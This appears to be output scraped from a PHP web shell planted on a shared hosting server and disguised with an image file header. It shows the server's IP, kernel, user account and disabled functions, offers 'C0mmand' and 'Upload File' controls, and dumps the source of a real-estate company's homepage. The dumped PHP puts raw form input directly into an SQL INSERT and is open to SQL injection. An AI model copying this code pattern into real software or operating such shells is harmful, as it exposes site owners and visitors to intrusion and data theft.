����JFIF��x�x������Exif��MM�*���� ����E���J����������������(������������������
Server IP : 103.191.208.227 / Your IP : 3.14.255.181 Web Server : LiteSpeed System : Linux emphasis.herosite.pro 4.18.0-553.8.1.lve.el8.x86_64 #1 SMP Thu Jul 4 16:24:39 UTC 2024 x86_64 User : mhmsfzcs ( 1485) PHP Version : 8.1.31 Disable Function : show_source, system, shell_exec, passthru, exec MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home/mhmsfzcs/vflyorions.com/../highlandbnd.com-bk/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php $page='home'; include 'header.php'; include 'admin/db.php'; // Check if the form is submitted if (isset($_POST['submit'])) { // Capture and sanitize form data $name = $_POST['name']; $email =$_POST['email']; $city = $_POST['city']; $contact =$_POST['contact']; $message = $_POST['message']; // Insert query $sql = "INSERT INTO web_contact (name, email, city, contact, message) VALUES ('$name', '$email', '$city', '$contact', '$message')"; // Execute the query if ($conn->query($sql) === TRUE) { // If successful, trigger SweetAlert success notification echo "<script> Swal.fire({ icon: 'success', title: 'Message Sent!', text: 'Thank you, your message has been sent successfully.', confirmButtonColor: '#2d6a4f' }).then(function() { window.location = 'index.php'; // Redirect after OK is clicked }); </script>"; } else { // If there is an error, trigger SweetAlert error notification echo "<script> Swal.fire({ icon: 'error', title: 'Oops...', text: 'Something went wrong. Please try again later!', confirmButtonColor: '#d33' }); </script>"; } // Close the connection $conn->close(); } ?> <style> .rv-20-service_section { /*background: #f7f7f7;*/ padding: 47px 0; position: relative; z-index: 2; } @media(max-width:767px){ .rv-20-service_section .rv-20-single_service_iamge img{ object-fit: contain !important; } .rv-20-contact_main_section .rv-20-contact_image img { height: auto !important; width: 100% !important; object-fit: inherit !important; } .rv-20-about_image{ margin-left: 31px; } .rv-20-contact_section_heading{ background: #ffffffab; padding: 11px 0; } } </style> <style> /* Style for popup container */ #popup { Z-INDEX: 1111; display: none; position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: rgba(0, 0, 0, 0.5); justify-content: center; align-items: center; } /* Style for popup content */ .popup-content { background: linear-gradient(rgb(223 255 224 / 84%), rgb(255 255 255 / 39%)), url(img/finnalbackhigh.jpg) no-repeat center center; /* background: url(img/finalbackimg1.jpg); */ background-size: cover; background-repeat: repeat; padding: 20px; border-radius: 5px; width: 750px; position: relative; text-align: center; } .popup-content h2{ font-size: 26px; font-family: system-ui; color: #0a5e1a; margin-top: 5%; letter-spacing: 1px; font-weight: 700; } /* Close button (icon) */ .close-icon { position: absolute; top: 10px; right: 10px; font-size: 20px; font-weight: bold; cursor: pointer; } .close-icon:hover { color: #ff5e5e; } /* Optional: Close button at the bottom */ .close-btn { background-color: #ff5e5e; color: #fff; padding: 5px 10px; border: none; border-radius: 3px; cursor: pointer; margin-top: 20px; } @media(max-width:767px){ .popup-img{ width: 73%; position: relative; left: 50px; } } </style> <!-- Popup HTML --> <div id="popup"> <div class="popup-content"> <span class="close-icon" id="closePopupIcon">×</span> <!-- Close icon --> <div class="row"> <div class="col-lg-6 col-md-6 col-12 popup-img"> <img src="img/offer.gif" alt="Popup Image" class="popup-image"> </div> <div class="col-lg-6 col-md-6 col-12 "> <h2>Celebrate Navratri with Exclusive Offers!</h2> <p class="mt-3">Join us this Navratri and enjoy amazing discounts, special deals, and festive surprises. </p> <form method="POST" class="rv-20-contact_form"> <div class="row rv-20-form_row"> <div class="col"> <input type="text" class="form-control" name="name" placeholder="Full Name" style="border-radius: 0px !important;margin: 2% 0;"> </div> </div> <div class="row rv-20-form_row"> <div class="col"> <input type="text" class="form-control" name="phone" placeholder="Phone No" style="border-radius: 0px !important;margin: 2% 0;"> </div> </div> <div class="rv-20-contact_form_button"> <button name="submit" type="submit" style="background: #2d6a4f;color: white; width: -webkit-fill-available; padding: 2% 0; letter-spacing: 1px; font-weight: bold;">Submit <i class="fas fa-arrow-right"></i></button> </div> </form> </div> </div> <button class="close-btn" id="closePopup" style="display:none">Close</button> <!-- Optional close button --> </div> </div> <!-- JavaScript to handle popup display --> <script> document.addEventListener('DOMContentLoaded', function () { // Check if the popup has already been shown in the current tab session if (!sessionStorage.getItem('popupShown')) { // Show the popup document.getElementById('popup').style.display = 'flex'; // Set popupShown flag in sessionStorage for this tab sessionStorage.setItem('popupShown', 'true'); } // Close the popup when the close button or close icon is clicked document.getElementById('closePopup').addEventListener('click', function () { document.getElementById('popup').style.display = 'none'; }); document.getElementById('closePopupIcon').addEventListener('click', function () { document.getElementById('popup').style.display = 'none'; }); }); </script> <section class="main_slider_area"> <div class="video-wrapper"> <video autoplay="" muted="" loop="" playsinline="" preload="metadata" style="width: -webkit-fill-available !important;"> <!--<source src="assets/img/project01.mp4" type="video/mp4">--> <source src="img/highlandfinalban3.mp4" type="video/mp4"> </video> </div> </section> <!-- END INDEX-20 BANNER SLIDER --> <!-- START INDEX-20 SERVICE SECTION --> <section class="rv-20-service_section"> <div class="container"> <div class="row justify-content-center" data-aos="fade-down"> <div class="col-md-6"> <div class="rv-20-service_section_heading"> <p class="rv-20-service_sub_title rv-text-anime"> <span></span> Plotting Services</p> <h2 class="rv-20-service_section_title rv-text-anime">Secure Your Future with Smart Investments</h2> </div> </div> </div> <div class="row justify-content-center" data-aos="fade-up"> <div class="col-lg-4 col-sm-10 col-md-6"> <div class="rv-20-single_service"> <div class="rv-20-single_service_iamge"> <img src="img/farmhousewithswimming.png" alt="image"> </div> <div class="rv-20-single_service_content_main"> <div class="visible-part"> <div class="rv-20-single_service_content_top"> <div class="rv-20-single_service_icon"> <img src="assets/img/barn.png" alt="image"> </div> </div> <div class="rv-20-single_service_content_title"> <h4>Farmhouse Living</h4> </div> </div> <div class="hidden-part"> <p style="text-align:justify"> Benefit from significant appreciation on farmland investments, leveraging our long-standing legacy and expertise to maximize your capital growth. </p> <!--<ul class="rv-20-single_service_list">--> <!-- <li> <i class="fal fa-arrow-to-right"></i>Landscape Design</li>--> <!-- <li> <i class="fas fa-check"></i>Irrigation Management</li>--> <!-- <li> <i class="fas fa-check"></i>Plant Care</li>--> <!-- <li> <i class="fas fa-check"></i>Outdoor Lighting</li>--> <!--</ul>--> <a href="" class="rv-20-service_btn"> <span class="rv-20-service_btn_txt">Read More</span> <i class="fal fa-arrow-right"></i></a> </div> <!--<h4 class="rv-20-service_drp_txt">plant care</h4>--> </div> </div> </div> <div class="col-lg-4 col-sm-10 col-md-6"> <div class="rv-20-single_service"> <div class="rv-20-single_service_iamge"> <img src="assets/img/investment.jpg" alt="image"> </div> <div class="rv-20-single_service_content_main"> <div class="visible-part"> <div class="rv-20-single_service_content_top"> <div class="rv-20-single_service_icon"> <img src="assets/img/plot.png" alt="image"> </div> </div> <div class="rv-20-single_service_content_title"> <h4>Diverse Investment Options</h4> </div> </div> <div class="hidden-part"> <p style="text-align:justify"> Explore a variety of investment choices, such as residential plots, commercial points, and farmhouses, all customized for your financial goals and preferences. </p> <!--<ul class="rv-20-single_service_list">--> <!-- <li> <i class="fas fa-check"></i>Landscape Design</li>--> <!-- <li> <i class="fas fa-check"></i>Irrigation Management</li>--> <!-- <li> <i class="fas fa-check"></i>Plant Care</li>--> <!-- <li> <i class="fas fa-check"></i>Outdoor Lighting</li>--> <!--</ul>--> <a href="" class="rv-20-service_btn"> <span class="rv-20-service_btn_txt">Read More</span> <i class="fal fa-arrow-right"></i></a> </div> <!--<h4 class="rv-20-service_drp_txt">Garden Care</h4>--> </div> </div> </div> <div class="col-lg-4 col-sm-10 col-md-6"> <div class="rv-20-single_service"> <div class="rv-20-single_service_iamge"> <img src="assets/img/land.jpg" alt="image"> </div> <div class="rv-20-single_service_content_main"> <div class="visible-part"> <div class="rv-20-single_service_content_top"> <div class="rv-20-single_service_icon"> <img src="assets/img/palms.png" alt="image"> </div> </div> <div class="rv-20-single_service_content_title"> <h4>Lifetime Income Generation</h4> </div> </div> <div class="hidden-part"> <p style="text-align:justify"> Invest in Highland Builders & Developers to acquire secure and dependable revenue streams via valuable farmland that yields dependable returns from the cultivation of dates and fruits. </p> <!--<ul class="rv-20-single_service_list">--> <!-- <li> <i class="fas fa-check"></i>Landscape Design</li>--> <!-- <li> <i class="fas fa-check"></i>Irrigation Management</li>--> <!-- <li> <i class="fas fa-check"></i>Plant Care</li>--> <!-- <li> <i class="fas fa-check"></i>Outdoor Lighting</li>--> <!--</ul>--> <a href="" class="rv-20-service_btn"> <span class="rv-20-service_btn_txt">Read More</span> <i class="fal fa-arrow-right"></i></a> </div> <!--<h4 class="rv-20-service_drp_txt">Beauty full</h4>--> </div> </div> </div> </div> </div> <span class="service-sh-1"><img src="assets/img/services/home-6-service-4.png" alt="image"></span> <span class="service-sh-2"><img src="assets/img/services/home-6-service-5.png" alt="image"></span> </section> <!-- END INDEX-20 SERVICE SECTION --> <!-- END INDEX-20 ABOUT SECTION --> <section class="rv-20-about_section"> <div class="container"> <div class="row"> <div class="col-md-12 col-lg-6 col-xl-5"> <div class="rv-20-about_image"> <img data-aos="fade-down" src="img/homeabt1.jpg" alt="image"> <img data-aos="fade-up" src="img/homeabt2.jpg" alt="image"> <div class="rv-20-about_experience_txt"> <h3>1+</h3> <p>Year of Experience</p> </div> </div> </div> <div class="col-md-12 col-lg-6 col-xl-7"> <div class="rv-20-about_section_content" data-aos="fade-up"> <div class="rv-20-about_section_heading"> <p class="rv-20-about_sub_title rv-text-anime"> <span></span> About Us</p> <h2 class="rv-20-about_section_title rv-text-anime">Innovative Solutions for Modern Living and Investment</h2> </div> <div class="rv-20-about_content_top_actions"> <p style="text-align:justify"> Highland Builders & Developer's imaginative strategy is based on a dedication to supporting community progress and boosting investor success. We anticipate a future in which our broad array of investments—from luxurious farmhouses and commercial properties to prime residential plots and thriving agricultural ventures—leaves a lasting and significant legacy. Our objective is not only to provide consistent income and high-value appreciation but also to promote and sell agricultural products, thereby contributing to local development. </p> <!--<div class="rv-20-about_content_single_top_actions">--> <!-- <div class="rv-20-about_content_single_top_actions_left">--> <!-- <h3>Our Goals</h3>--> <!-- <p>Denim aliquot poseurs locus..!</p>--> <!-- </div>--> <!-- <div class="rv-20-about_content_single_top_actions_icon">--> <!-- <i class="fas fa-chevron-right"></i>--> <!-- </div>--> <!--</div>--> <!--<div class="rv-20-about_content_single_top_actions">--> <!-- <div class="rv-20-about_content_single_top_actions_left">--> <!-- <h3>Our Goals</h3>--> <!-- <p>Denim aliquot poseurs locus..!</p>--> <!-- </div>--> <!-- <div class="rv-20-about_content_single_top_actions_icon">--> <!-- <i class="fas fa-chevron-right"></i>--> <!-- </div>--> <!--</div>--> </div> <div class="rv-20-about_list"> <ul> <li> <h4><i class="far fa-chevron-double-right"></i>Prime Location</h4> <!--<p>Suspends potent Cu abitur vestibulum poseurs sagittal trips.</p>--> </li> <li> <h4><i class="far fa-chevron-double-right"></i>Agricultural Expertise</h4> <!--<p>Suspends potent Cu abitur vestibulum poseurs sagittal trips.</p>--> </li> <!--<li>--> <!-- <h4><i class="far fa-chevron-double-right"></i>Gardens</h4>--> <!-- <p>Suspends potent Cu abitur vestibulum poseurs sagittal trips.</p>--> <!--</li>--> <!--<li>--> <!-- <h4><i class="far fa-chevron-double-right"></i>Gardens</h4>--> <!-- <p>Suspends potent Cu abitur vestibulum poseurs sagittal trips.</p>--> <!--</li>--> </ul> </div> </div> </div> </div> </div> <span class="about-sh-6"> <img src="assets/img/about/home-6-about-3.png" alt="image"></span> </section> <!-- END INDEX-20 ABOUT SECTION --> <!-- CATEGORIES SECTION START --> <section class="rv-12-categories rv-section-spacing" style="margin-top:-90px"> <div class="container"> <div class="rv-7-section__heading"> <h6 class="rv-7-section__sub-title rv-text-anime">Project Highlights</h6> <h2 class="rv-7-section__title rv-text-anime">Prime Locations for Prosperous Living</h2> </div> <div class="row rv-12-categories__row"> <div class="col-lg-3 col-6 col-xxs-12" data-aos="fade-right"> <div class="rv-12-category"> <div class="rv-12-category__img"> <img src="assets/img/location 02.png" alt="Category Sample"> </div> <div class="rv-12-category__txt"> <h6 class="rv-12-category__title"><a href="#">Strategically Located</a></h6> <p class="rv-12-category__descr">Our properties are situated in prime locations that offer easy accessibility and proximity to key amenities, ensuring both convenience and connectivity for residents and businesses.</p> </div> </div> </div> <div class="col-lg-3 col-6 col-xxs-12" data-aos="fade-right" data-aos-delay="200"> <div class="rv-12-category"> <div class="rv-12-category__img"> <img src="assets/img/peaceful 02.png" alt="Category Sample"> </div> <div class="rv-12-category__txt"> <h6 class="rv-12-category__title"><a href="#">Peaceful Surroundings</a></h6> <p class="rv-12-category__descr">Enjoy the serenity of well-planned landscapes meant to provide a calm refuge from the rush and bustle of city life, ideal for rest and renewal. </p> </div> </div> </div> <div class="col-lg-3 col-6 col-xxs-12" data-aos="fade-right" data-aos-delay="400"> <div class="rv-12-category"> <div class="rv-12-category__img"> <img src="assets/img/community development.png" alt="Category Sample"> </div> <div class="rv-12-category__txt"> <h6 class="rv-12-category__title"><a href="#">Community Development</a></h6> <p class="rv-12-category__descr"> Invest in areas that contribute to overall community growth and development, with a focus on creating vibrant, sustainable neighborhoods. </p> </div> </div> </div> <div class="col-lg-3 col-6 col-xxs-12" data-aos="fade-right" data-aos-delay="600"> <div class="rv-12-category rv-12-category--last"> <div class="rv-12-category__img"> <img src="assets/img/peaceful surrounding 01.png" alt="Category Sample"> </div> <div class="rv-12-category__txt"> <h6 class="rv-12-category__title"><a href="#">Scenic Beauty</a></h6> <p class="rv-12-category__descr">Real estate and Embrace the organic beauty of our landscapes, which are crafted to blend in with the surroundings and offer breathtaking views, improving the standard of living for every one of our clients. </p> </div> </div> </div> </div> <!--<a href="#" class="rv-3-def-btn rv-12-def-btn">View All Category</a>--> </div> </section> <!-- CATEGORIES SECTION END --> <!-- INFOS SECTION START --> <section class="rv-12-infos pt-160 pb-160"> <div class="container"> <div class="row align-items-center rv-12-infos__row rv-9-guides__row justify-content-evenly"> <div class="col-xl-4 col-lg-5 col-6 col-xxs-12"> <div class="rv-8-service rv-9-guide rv-12-info" data-aos="fade-up"> <div class="rv-9-service__icon"> <img src="img/homefarmhouse1.png" alt="Category Sample" > </div> <div class="rv-9-guide__txt"> <h4 class="rv-3-service__title"><a href="#">Farmhouse</a></h4> <p class="rv-3-service__descr" style="text-align:justify">Our plots offer the perfect foundation to build a home where you can create memories and enjoy a comfortable life. </p> </div> </div> <div class="rv-8-service rv-9-guide rv-12-info" data-aos="fade-up" data-aos-delay="150"> <div class="rv-9-service__icon"> <img src="img/homeswimming.png" alt="Category Sample" > </div> <div class="rv-9-guide__txt"> <h4 class="rv-3-service__title"><a href="#">Swimming Pool</a></h4> <p class="rv-3-service__descr" style="text-align:justify">Our properties offer the ideal space to install a pool, where you can relax, have fun with family and friends, and enjoy a refreshing dip whenever you want. </p> </div> </div> <div class="rv-8-service rv-9-guide rv-12-info" data-aos="fade-up" data-aos-delay="300"> <div class="rv-9-service__icon"> <img src="img/homeplayground.png" alt="Category Sample" > </div> <div class="rv-9-guide__txt"> <h4 class="rv-3-service__title"><a href="#">Playground</a></h4> <p class="rv-3-service__descr" style="text-align:justify">Our plots offer enough room to include a playground where your kids can enjoy endless hours of fun and activity.</p> </div> </div> </div> <div class="col-xl-4 d-none d-xl-block"> <div class="rv-9-guides__img text-center" data-aos="fade-up"> <img src="img/dream022.png" alt=""> </div> </div> <div class="col-xl-4 col-lg-5 col-6 col-xxs-12"> <div class="rv-8-service rv-9-guide rv-12-info" data-aos="fade-up"> <div class="rv-9-service__icon"> <img src="img/homegym.png" alt="Category Sample" > </div> <div class="rv-9-guide__txt"> <h4 class="rv-3-service__title"><a href="#">Gym</a></h4> <p class="rv-3-service__descr" style="text-align:justify">Our properties provide the opportunity to have a well-equipped gym close to home, making it convenient to keep up with your fitness routine without the need to travel far. </p> </div> </div> <div class="rv-8-service rv-9-guide rv-12-info" data-aos="fade-up" data-aos-delay="150"> <div class="rv-9-service__icon"> <img src="img/homedates.png" alt="Category Sample" > </div> <div class="rv-9-guide__txt"> <h4 class="rv-3-service__title"><a href="#">Dates Trees</a></h4> <p class="rv-3-service__descr" style="text-align:justify">Our fertile plots are perfect for growing dates trees, allowing you to enjoy both the natural beauty and the financial benefits that come with them.</p> </div> </div> <div class="rv-8-service rv-9-guide rv-12-info" data-aos="fade-up" data-aos-delay="300"> <div class="rv-9-service__icon"> <img src="img/homegarden.png" alt="Category Sample" > </div> <div class="rv-9-guide__txt"> <h4 class="rv-3-service__title"><a href="#">Garden</a></h4> <p class="rv-3-service__descr" style="text-align:justify">Our properties offer plenty of space to create a beautiful garden that will become your favorite place. </p> </div> </div> </div> </div> </div> <div class="rv-12-infos__vectors" id="rv-12-infos-vectors"> <img src="assets/img/rv-12-infos-vector.png" alt="vector" class="rv-12-infos-vector"> <img src="assets/img/rv-12-infos-vector.png" alt="vector" class="rv-12-infos-vector"> </div> <div class="rv-12-infos__vectors rv-12-infos__vectors--2" id="rv-12-infos-vectors-2"> <img src="assets/img/rv-12-infos-vector.png" alt="vector" class="rv-12-infos-vector"> <img src="assets/img/rv-12-infos-vector.png" alt="vector" class="rv-12-infos-vector"> </div> </section> <!-- INFOS SECTION END --> <br><br><br><br> <!-- START INDEX-20 PORTFOLIO SECTION --> <section class="rv-20-portfolio_section" data-aos="fade-up"> <div class="row rv-20-ins_gp"> <div class="rv-20-portfolio_slide swiper"> <div class="swiper-wrapper"> <div class="rv-20-single_portfolio swiper-slide"> <div class="rv-20-single_portfolio_image"> <img src="assets/img/gal1.png" alt="image"> <div class="rv-20-portfolio_content"> <a class="rv-20-portfolio_content_icon" href="#"> <i class="fal fa-plus"></i></a> <div class="rv-20-portfolio_content_txt"> <p>Gallery</p> <h3>Our Recent Images</h3> </div> </div> </div> </div> <div class="rv-20-single_portfolio swiper-slide"> <div class="rv-20-single_portfolio_image"> <img src="assets/img/gal2.png" alt="image"> <div class="rv-20-portfolio_content"> <a class="rv-20-portfolio_content_icon" href="#"> <i class="fal fa-plus"></i></a> <div class="rv-20-portfolio_content_txt"> <p>Gallery</p> <h3>Our Recent Images</h3> </div> </div> </div> </div> <div class="rv-20-single_portfolio swiper-slide"> <div class="rv-20-single_portfolio_image"> <img src="assets/img/gal3.png" alt="image"> <div class="rv-20-portfolio_content"> <a class="rv-20-portfolio_content_icon" href="#"> <i class="fal fa-plus"></i></a> <div class="rv-20-portfolio_content_txt"> <p>Gallery</p> <h3>Our Recent Images</h3> </div> </div> </div> </div> <div class="rv-20-single_portfolio swiper-slide"> <div class="rv-20-single_portfolio_image"> <img src="assets/img/gal4.png" alt="image"> <div class="rv-20-portfolio_content"> <a class="rv-20-portfolio_content_icon" href="#"> <i class="fal fa-plus"></i></a> <div class="rv-20-portfolio_content_txt"> <p>Gallery</p> <h3>Our Recent Images</h3> </div> </div> </div> </div> <div class="rv-20-single_portfolio swiper-slide"> <div class="rv-20-single_portfolio_image"> <img src="assets/img/gal5.png" alt="image"> <div class="rv-20-portfolio_content"> <a class="rv-20-portfolio_content_icon" href="#"> <i class="fal fa-plus"></i></a> <div class="rv-20-portfolio_content_txt"> <p>Gallery</p> <h3>Our Recent Images</h3> </div> </div> </div> </div> <div class="rv-20-single_portfolio swiper-slide"> <div class="rv-20-single_portfolio_image"> <img src="assets/img/gal1.png" alt="image"> <div class="rv-20-portfolio_content"> <a class="rv-20-portfolio_content_icon" href="#"> <i class="fal fa-plus"></i></a> <div class="rv-20-portfolio_content_txt"> <p>Gallery</p> <h3>Our Recent Images</h3> </div> </div> </div> </div> <div class="rv-20-single_portfolio swiper-slide"> <div class="rv-20-single_portfolio_image"> <img src="assets/img/gal2.png" alt="image"> <div class="rv-20-portfolio_content"> <a class="rv-20-portfolio_content_icon" href="#"> <i class="fal fa-plus"></i></a> <div class="rv-20-portfolio_content_txt"> <p>Gallery</p> <h3>Our Recent Images</h3> </div> </div> </div> </div> <div class="rv-20-single_portfolio swiper-slide"> <div class="rv-20-single_portfolio_image"> <img src="assets/img/gal3.png" alt="image"> <div class="rv-20-portfolio_content"> <a class="rv-20-portfolio_content_icon" href="#"> <i class="fal fa-plus"></i></a> <div class="rv-20-portfolio_content_txt"> <p>Gallery</p> <h3>Our Recent Images</h3> </div> </div> </div> </div> </div> </div> </div> </section> <!-- END INDEX-20 PORTFOLIO SECTION --> <!-- START INDEX-20 CONTACT SECTION --> <section class="rv-20-contact_main_section"> <div class="container"> <div class="row"> <div class="col-md-12 col-lg-5"> <div class="rv-20-contact_image" data-aos="fade-up"> <img src="assets/img/image 666.jpg" alt="image"> </div> </div> <div class="col-md-12 col-lg-7"> <div class="rv-20-contact_form_area" data-aos="fade-up"> <div class="rv-20-contact_section_heading"> <p class="rv-20-contact_sub_title rv-text-anime"> <span></span>Get in Touch</p> <h2 class="rv-20-contact_section_title rv-text-anime">Discover Our Services Today</h2> </div> <form method="POST" class="rv-20-contact_form"> <div class="row rv-20-form_row"> <div class="col"> <input type="text" class="form-control" name="name" placeholder="Full Name"> </div> <div class="col"> <input type="text" class="form-control" name="contact" placeholder="Phone Number"> </div> </div> <div class="row rv-20-form_row"> <div class="col"> <input type="email" class="form-control" name="email" placeholder="Email Address"> </div> <div class="col"> <input type="text" class="form-control" name="city" placeholder="City"> </div> </div> <textarea placeholder="Your Message" name="message"></textarea> <div class="rv-20-contact_form_button"> <button name="submit" type="submit">Send Message <i class="fas fa-arrow-right"></i></button> </div> </form> </div> </div> </div> </div> <span class="home-6-sh-1"> <img src="assets/img/contact/home-6-sh-1.png" alt="image"></span> <span class="home-6-sh-2"> <img src="assets/img/contact/home-6-sh-2.png" alt="image"></span> </section> <!-- END INDEX-20 CONTACT SECTION --> <!-- START INDEX-20 BLOG SECTION --> <section class="rv-20-blog_section"> <div class="container"> <div class="row justify-content-center"> <div class="col-md-8"> <div class="rv-20-blog_section_heading" data-aos="fade-down"> <p class="rv-20-blog_sub_title rv-text-anime"> <span></span> Blogs and News</p> <h2 class="rv-20-blog_section_title rv-text-anime">Latest News & Article</h2> </div> </div> </div> <div class="row"> <?php $sql1 = "SELECT * FROM web_blog ORDER BY id DESC LIMIT 3"; $result1 = $conn->query($sql1); if ($result1->num_rows > 0) { while ($row1 = $result1->fetch_assoc()) { $description = $row1['description']; $shortDescription = strlen($description) > 100 ? substr($description, 0, 100) . '...' : $description; ?> <div class="col-md-6 col-lg-4"> <div class="rv-20-single_blog" data-aos="fade-up"> <div class="rv-20-blog_image"> <img src="admin/<?= $row1['image1']; ?>" alt="image"> <p class="rv-20-single_blog_date"> <i class="fal fa-calendar-alt"></i><?= $row1['date']; ?></p> </div> <h4 class="rv-20-single_blog_content_title"> <a href="blogs.php?id=<?= $row1['id']; ?>"><?= $row1['heading']; ?> </a> </h4> <p class="rv-20-single_blog_content_desc" style="text-align:justify"><?= htmlspecialchars($shortDescription); ?> <br><br><br> </p> <a href="blogs.php?id=<?= $row1['id']; ?>" class="rv-20-single_blog_btn">Read More <i class="far fa-arrow-right"></i></a> </div> </div> <?php }}else{ echo "Blgs Not Available. "; }?> <!--<div class="col-md-6 col-lg-4">--> <!-- <div class="rv-20-single_blog" data-aos="fade-up">--> <!-- <div class="rv-20-blog_image">--> <!-- <img src="assets/img/blog2.png" alt="image">--> <!-- <p class="rv-20-single_blog_date"> <i class="fal fa-calendar-alt"></i>Agust 2, 2024</p>--> <!-- </div>--> <!-- <h4 class="rv-20-single_blog_content_title">--> <!-- <a href="Agricultural-Land.php">Why Invest in Agricultural Land? Insights from Highland Builders & Developers.</a>--> <!-- </h4>--> <!-- <p class="rv-20-single_blog_content_desc">As the world’s population continues to expand and urban areas become increasingly congested,--> <!-- investors are turning their eyes to a less conventional </p><br>--> <!-- <a href="Agricultural-Land.php" class="rv-20-single_blog_btn">Read More <i class="far fa-arrow-right"></i></a>--> <!-- </div>--> <!--</div>--> <!--<div class="col-md-6 col-lg-4">--> <!-- <div class="rv-20-single_blog" data-aos="fade-up">--> <!-- <div class="rv-20-blog_image">--> <!-- <img src="assets/img/blog3.png" alt="image">--> <!-- <p class="rv-20-single_blog_date"> <i class="fal fa-calendar-alt"></i>Agust 1, 2024</p>--> <!-- </div>--> <!-- <h4 class="rv-20-single_blog_content_title">--> <!-- <a href="Economic-Potential.php">The Economic Potential of Dates Trees: An Investment for Agricultural Ventures</a>--> <!-- </h4>--> <!-- <p class="rv-20-single_blog_content_desc">Date trees, or Phoenix dactylifera, have been cultivated for thousands of years, symbolizing fertility and prosperity in many cultures. --> <!-- </p><br><br>--> <!-- <a href="Economic-Potential.php" class="rv-20-single_blog_btn">Read More <i class="far fa-arrow-right"></i></a>--> <!-- </div>--> <!--</div>--> </div> </div> </section> <!-- END INDEX-20 BLOG SECTION --> <!-- TESTIMONIAL SECTION START --> <section class="rv-12-testimonial text-center rv-section-spacing" data-aos="fade-up"> <div class="container position-relative"> <h6 class="rv-7-section__sub-title rv-text-anime">Customer Review</h6> <div class="row justify-content-center"> <div class="col-xxl-7 col-xl-8 col-md-9"> <div class="rv-12-testimonial__slider swiper"> <div class="swiper-wrapper"> <div class="rv-12-testimony swiper-slide"> <div class="rv-3-product__rating rv-3-testimony__rating"> <i class="fa-solid fa-star"></i> <i class="fa-solid fa-star"></i> <i class="fa-solid fa-star"></i> <i class="fa-solid fa-star"></i> <i class="fa-regular fa-star"></i> </div> <p class="rv-3-testimony__txt">“Suspendisse in consectetur justo. Suspends molestee lorem accusant mattis rutrum. Nunc facilisis ultricies mi, et porta diam lobortis non. In hac habitasse platea dictumst”</p> </div> <div class="rv-12-testimony swiper-slide"> <div class="rv-3-product__rating rv-3-testimony__rating"> <i class="fa-solid fa-star"></i> <i class="fa-solid fa-star"></i> <i class="fa-solid fa-star"></i> <i class="fa-solid fa-star"></i> <i class="fa-regular fa-star"></i> </div> <p class="rv-3-testimony__txt">“Suspendisse in consectetur justo. Suspends molestee lorem accusant mattis rutrum. Nunc facilisis ultricies mi, et porta diam lobortis non. In hac habitasse platea dictumst”</p> </div> <div class="rv-12-testimony swiper-slide"> <div class="rv-3-product__rating rv-3-testimony__rating"> <i class="fa-solid fa-star"></i> <i class="fa-solid fa-star"></i> <i class="fa-solid fa-star"></i> <i class="fa-solid fa-star"></i> <i class="fa-regular fa-star"></i> </div> <p class="rv-3-testimony__txt">“Suspendisse in consectetur justo. Suspends molestee lorem accusant mattis rutrum. Nunc facilisis ultricies mi, et porta diam lobortis non. In hac habitasse platea dictumst”</p> </div> </div> </div> <div class="rv-12-testimony__img-slider swiper"> <div class="swiper-wrapper justify-content-center align-items-center"> <div class="swiper-slide rv-3-testimony-img"> <img src="assets/img/rv-3-testimony-1.png" alt="reviewer image"> </div> <div class="swiper-slide rv-3-testimony-img"> <img src="assets/img/rv-3-testimony-2.png" alt="reviewer image"> </div> <div class="swiper-slide rv-3-testimony-img"> <img src="assets/img/rv-3-testimony-3.png" alt="reviewer image"> </div> </div> </div> <div class="rv-1-slider-nav rv-12-slider-nav rv-3-slider-nav-2 mt-0" id="rv-12-testimonial-slider-nav"> <button class="prev"><i class="fa-regular fa-arrow-left"></i></button> <button class="next"><i class="fa-regular fa-arrow-right"></i></button> </div> </div> </div> </div> </section> <!-- TESTIMONIAL SECTION END --> <!-- START INDEX-20 PRICE SECTION --> <!--<section class="rv-20-price_section">--> <!-- <div class="container">--> <!-- <div class="row justify-content-center">--> <!-- <div class="col-md-12">--> <!-- <div class="rv-20-price_section_heading" data-aos="fade-down">--> <!-- <p class="rv-20-price_sub_title rv-text-anime"> <span></span> Pricing Plan</p>--> <!-- <h2 class="rv-20-price_section_title rv-text-anime">Limited-Time Promotions</h2>--> <!-- </div>--> <!-- </div>--> <!-- </div>--> <!-- <div class="row" data-aos="fade-up">--> <!-- <div class="col-md-6 col-lg-4">--> <!-- <div class="rv-20-single_pricing_plan">--> <!-- <div class="rv-20-pricing_plan_header">--> <!-- <h3 class="rv-20-pricing_plan_header_title">Basic Plan</h3>--> <!-- <p class="rv-20-pricing_plan_header_desc">Denim aliquot abitur poseurs locus..!</p>--> <!-- </div>--> <!-- <h4 class="rv-20-pricing_plan_price"> $59<sub>/MONTH</sub></h4>--> <!-- <ul>--> <!-- <li><i class="fal fa-arrow-to-right"></i>Check the health of plants</li>--> <!-- <li><i class="fal fa-arrow-to-right"></i>Water properly</li>--> <!-- <li><i class="fal fa-arrow-to-right"></i>Treat your soil</li>--> <!-- <li><i class="fal fa-arrow-to-right"></i>Destroy the weeds</li>--> <!-- <li><i class="fal fa-arrow-to-right"></i>Try raised beds</li>--> <!-- <li>--> <!-- <span class="rv-20-single_pricing_bg"> <img src="assets/img/price/home-6-1.png" alt="image"></span>--> <!-- </li>--> <!-- </ul>--> <!-- <a class="rv-20-pricing_plan_btn" href="#">Start Today</a>--> <!-- </div>--> <!-- </div>--> <!-- <div class="col-md-6 col-lg-4">--> <!-- <div class="rv-20-single_pricing_plan">--> <!-- <div class="rv-20-pricing_plan_header">--> <!-- <h3 class="rv-20-pricing_plan_header_title">Standard Plan</h3>--> <!-- <p class="rv-20-pricing_plan_header_desc">Denim aliquot abitur poseurs locus..!</p>--> <!-- </div>--> <!-- <h4 class="rv-20-pricing_plan_price"> $79<sub>/MONTH</sub></h4>--> <!-- <ul>--> <!-- <li><i class="fal fa-arrow-to-right"></i>Free Landscape Design</li>--> <!-- <li><i class="fal fa-arrow-to-right"></i>Destroy the weeds</li>--> <!-- <li><i class="fal fa-arrow-to-right"></i>Water properly</li>--> <!-- <li><i class="fal fa-arrow-to-right"></i>Treat your soil</li>--> <!-- <li><i class="fal fa-arrow-to-right"></i>Try raised beds</li>--> <!-- <li>--> <!-- <span class="rv-20-single_pricing_bg"> <img src="assets/img/price/home-6-1.png" alt="image"></span>--> <!-- </li>--> <!-- </ul>--> <!-- <a 